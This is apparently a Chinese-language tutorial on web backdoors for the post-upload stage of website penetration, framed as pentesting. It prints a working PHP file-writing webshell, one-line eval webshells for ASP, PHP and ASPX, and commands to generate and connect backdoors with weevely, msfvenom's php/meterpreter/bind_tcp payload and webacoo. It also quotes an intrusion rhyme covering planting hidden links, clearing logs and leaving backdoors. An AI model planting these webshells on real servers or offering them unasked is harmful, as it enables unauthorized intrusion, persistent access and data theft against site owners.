在對一個web站點進行滲透測試的滲透攻擊階段,一般會想辦法突破上傳限制,向目標可執行目錄中寫入一個帶有攻擊性質的腳本來協助獲取更大的服務器權限。
這里我們就一起來盤點一下常用的web后門吧
大馬與小馬
在幾年前很流行的網站入侵打油詩中有寫
進谷歌 找注入
沒注入 就旁注
沒旁注 用0day
沒0day 猜目錄
沒目錄 就嗅探
爆賬戶 找后臺
傳小馬 放大馬
拿權限 掛頁面
放暗鏈 清數據
清日志 留后門
其中的傳小馬上大馬就是我們要說的小馬大馬了,小馬的功能一般都比較單一,作用一般是向服務器中寫入文件數據。因為其功能單一的特性,隱蔽性通常都比較高。有些網站對上傳文件大小做了限制,小馬因為占用空間也小也能繞過這些限制
這里貼一個php小馬
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>
form method="POST">
保存文件名: input type="text" name="file" size="60" value=" echo str_replace('\\','/',__FILE__) ?>">
br>br>
textarea name="text" COLS="70" ROWS="18" >textarea>
br>br>
input type="submit" name="submit" value="保存">
form>
if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失敗!';
@fclose($fp);
}
?>
大馬一般就提供了更多的功能,例如輔助提權,執行sql語句,反彈shell等。
不過網上很多的大馬都加了后門,例如圖中的這款從mumaasp.com這個網站下載的一款大馬會將木馬的地址和密碼提交到http://www.mumaasp.com/xz/sx.asp這個網址

中國菜刀

中國菜刀和一句話木馬想必是大家最熟悉的了,中國菜刀支持asp、php、asp.net和jsp等web編程語言,小巧的中國菜刀還自帶了很多實用的功能。例如虛擬終端

還有例如安全掃描,定時鬧鐘,數據庫管理等功能,甚至內置了一個網頁瀏覽器
使用方法也很簡單,就是往目標web服務器上傳相應的一句話木馬
asp一句話木馬:
"pass"))%>
php一句話木馬:
@eval($_POST[pass]);?>
aspx一句話木馬:
%@ Page Language="Jscript"%>
%eval(Request.Item["pass"])%>
網上也有很多仿冒中國菜刀的官網發布加了后門的中國菜刀
在linux下也有很多替代中國菜刀的開源產品,例如中國蟻劍和C刀
weevely
在kali linux中,我們用的比較多的就是這款php后門管理工具 weevely了。weevely支持的功能很強大,使用http頭進行指令傳輸。唯一的缺陷就是只支持php

我們通過幫助可以看到,weevely的使用還是很簡單的,首先我們在/root目錄下生成一個名為weevely.php密碼為123的backdoor agent
weevely generate 123 /root/weevely.php
然后我們只要上傳到目標服務器之后運行
weevely 就能成功連接上了

metasploit
metasploit框架中其實也自帶了php的后門,并且配合meterpreter功能強大
在這里提一下正向連接和反向連接(bind_tcp reverse_tcp)
bind_tcp:在這里黑客主動去連接目標主機,就叫作正向連接。適用的情況是服務器在外網的情況
reverse_tcp:在這個例子中反向連接就是被入侵的主機反過來來連接黑客,就叫作反向連接,在目標服務器在內網或有防火墻的情況下使用。
msfvenom -p php/meterpreter/bind_tcp lhost=172.24.3.20 lport=4444 -o /root/msf.php
其中lhost為目標服務器的地址 lport是目標服務器會開放的端口 -o后面是后門輸出的路徑
然后進入msfconsole

xu
選擇exploit/multi/handler這個模塊
然后設置payload為php/meterpreter/bind_tcp
最后設置一下目標的ip然后輸入run開始監聽
觸發木馬的方法就是訪問后門的網址

然后msfconsole如果有連接信息說明已經連接成功

使用方式可以參考meterpreter
參考鏈接](http://www.evil0x.com/posts/838.html
webacoo
webacoo是用base64編碼后隱藏在Cookie頭中,隱蔽性較強,webacoo的缺點是不能指定密碼,所以。。。不推薦作為持續性攻擊的權限維持的選擇
webacoo -g -o /root/webacoo.php
生成webacoo.php存放在/root目錄下

上傳成功之后用命令
webacoo -t -u 來連接

成功后會生成一個仿真終端,可以使用load命令來加載模塊,之后可以進行上傳下載,連接數據庫等操作。只是不能設置密碼是個硬傷。
|